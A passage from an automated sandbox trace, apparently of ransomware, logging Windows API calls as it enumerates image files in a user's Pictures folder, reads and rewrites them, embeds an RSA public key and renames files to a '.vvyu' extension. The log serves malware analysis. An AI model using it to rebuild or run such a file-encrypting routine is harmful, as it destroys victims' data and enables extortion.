hHeap=0x2c0000) returned 1 [0190.400] GetCurrentThreadId () returned 0x5d8 [0190.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae4d58 [0190.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.401] GetCurrentThreadId () returned 0x5d8 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.402] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd00 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dca0 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dd18 [0190.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ff348 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcd0 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dce8 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dca0 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd00 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dca0 | out: hHeap=0x2c0000) returned 1 [0190.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.406] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc88 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.408] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dc70 | out: hHeap=0x2c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3198 | out: hHeap=0x2c0000) returned 1 [0190.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.411] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.412] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.412] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x11dca, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x11dca, lpOverlapped=0x0) returned 1 [0190.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.413] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11dcf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.413] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.413] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.414] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.414] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.414] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.415] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.415] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.415] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.415] CloseHandle (hObject=0x584) returned 1 [0190.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0190.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0190.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.417] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\9IU4er.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\9iu4er.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\9IU4er.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\9iu4er.gif.vvyu")) returned 1 [0190.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.419] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.422] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6bcc50, ftCreationTime.dwHighDateTime=0x1d89820, ftLastAccessTime.dwLowDateTime=0x56b086a0, ftLastAccessTime.dwHighDateTime=0x1d89d55, ftLastWriteTime.dwLowDateTime=0x56b086a0, ftLastWriteTime.dwHighDateTime=0x1d89d55, nFileSizeHigh=0x0, nFileSizeLow=0x11b9d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ah9z8QW.bmp", cAlternateFileName="")) returned 1 [0190.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3198 [0190.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.422] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3198 | out: hHeap=0x2c0000) returned 1 [0190.422] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ah9z8QW.bmp") returned=".bmp" [0190.422] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ah9z8QW.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\ah9z8qw.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.424] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=72605) returned 1 [0190.424] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.426] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x11b77, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.427] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.429] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.429] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x11b9d, lpOverlapped=0x0) returned 1 [0190.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.430] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.430] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.431] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.431] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.431] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.431] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.431] GetLastError () returned 0x0 [0190.433] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.433] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.434] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.434] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.434] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11ba0) returned 0x2af5168 [0190.434] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3198 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc70 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af31e0 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dc88 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.435] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcd0 | out: hHeap=0x2c0000) returned 1 [0190.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dd18 | out: hHeap=0x2c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dd18 [0190.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 